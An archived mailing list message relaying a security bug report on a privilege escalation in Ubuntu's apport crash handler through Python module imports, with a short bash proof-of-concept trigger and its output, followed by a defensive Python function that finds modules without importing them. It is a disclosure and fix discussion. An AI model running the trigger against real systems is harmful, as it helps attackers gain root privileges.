touch-packages team mailing list archive
Message #113791
[Bug 1507480] Re: Privilege escalation through Python module imports
** Information type changed from Private Security to Public Security
** Changed in: apport (Ubuntu Xenial)
Assignee: Martin Pitt (pitti) => Marc Deslauriers (mdeslaur)
https://bugs.launchpad.net/bugs/1507480
Title:
  Privilege escalation through Python module imports
Status in Apport:
  In Progress
Status in apport package in Ubuntu:
  In Progress
Status in apport source package in Precise:
  Fix Released
Status in apport source package in Trusty:
  Fix Released
Status in apport source package in Vivid:
  Fix Released
Status in apport source package in Wily:
  Fix Released
Status in apport source package in Xenial:
  In Progress
Bug description:
Gabriel Campana <gabriel@xxxxxxxxxxxxxxxxx> reported a security
vulnerability in Apport:
Summary
=======
A privilege escalation was discovered in apport.
Details
=======
The command line of the process triggering the coredump is checked to
determine if it's a script. If the interpreter is Python and the first
argument is ``-m``, the method ``_python_module_path`` is called to find
the path of the culprit module
(``/usr/lib/python3/dist-packages/apport/report.py``)::
    @classmethod
    def _python_module_path(klass, module):
        '''Determine path of given Python module'''
        module = module.replace('/', '.')
        try:
            m = __import__(module)
            m
        except:
            return None
        [...]
Any Python module in ``sys.path`` can be imported because the variable
``module`` is under control of the attacker. It should be noted that
``_python_module_path`` is called with euid=0, and apport relies on the
process name to determine if the process is an interpreter. A crash of
Python isn't required to reach this function: any process name starting
with ``python`` and producing a core dump is enough. As an example, the
following bash script triggers the bug::
    #!/bin/bash
    cat <<EOF > python.c
    int main(void) { *(int *)0 = 0; return 0; }
    EOF
    gcc -o python python.c
    ./python -m venv.__main__
and results in the creation of a "lightweight virtual Python
environment" in the root directory::
    $ ./lol.sh
    ./lol.sh: line 8: 7665 Segmentation fault (core dumped)
    $ ls -l / | head -4
    total 100
    drw-rw---- 5 root root 4096 Sep 29 16:09 7665
    drwxr-xr-x 2 root root 4096 Sep 29 05:41 bin
    drwxr-xr-x 3 root root 4096 Sep 29 06:20 boot
Criticity
=========
Importing an arbitrary module is a security issue because a few standard
modules rely on files in the home directory associated with the uid of the
dumped process. A fully working exploit has been written (targeting
Python2 and Python3), giving an instant root shell to the attacker.
While the exploitation is straightforward for Python2, a bit more work
was required to find a suitable module for Python3.
The vulnerability seems to be limited to Ubuntu Desktop because apport
is disabled on Ubuntu Server.
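One way to find the file behind a ``-m`` argument without importing it, given as an added example (it is not apport's code and not part of the original report). The name ``python_module_path`` mirrors the method quoted in the report; ``demo()`` and the ``demo_pkg`` package are constructed for illustration.

```python
import importlib.machinery
import os
import sys
import tempfile


def python_module_path(module, search_path=None):
    """Locate a module's file without executing any of its code."""
    parts = module.replace('/', '.').split('.')
    if not all(parts):  # reject empty components such as "a..b"
        return None
    path, spec = search_path, None  # search_path=None means sys.path
    for i in range(len(parts)):
        name = '.'.join(parts[:i + 1])
        try:
            # PathFinder only consults the file system; unlike __import__ or
            # importlib.util.find_spec it never runs a parent __init__.py.
            spec = importlib.machinery.PathFinder.find_spec(name, path)
        except (ImportError, ValueError, KeyError):
            return None
        if spec is None:
            return None
        path = spec.submodule_search_locations  # None for a plain module
        if path is None and i < len(parts) - 1:
            return None  # a plain module cannot contain submodules
    return spec.origin if spec.has_location else None


def demo():
    """Constructed package whose __init__.py leaves a marker if it ever runs."""
    root = tempfile.mkdtemp()
    marker = os.path.join(root, 'executed')
    os.mkdir(os.path.join(root, 'demo_pkg'))
    with open(os.path.join(root, 'demo_pkg', '__init__.py'), 'w') as f:
        f.write('open(%r, "w").close()\n' % marker)
    with open(os.path.join(root, 'demo_pkg', '__main__.py'), 'w') as f:
        f.write('raise SystemExit("side effect")\n')
    found = python_module_path('demo_pkg/__main__', [root])
    return found, os.path.exists(marker), 'demo_pkg' in sys.modules, root


if __name__ == '__main__':
    print(demo()[:3])
```

The component-by-component walk matters because ``importlib.util.find_spec`` imports the parent package when given a dotted name, which would still execute code chosen by whoever controls the command line.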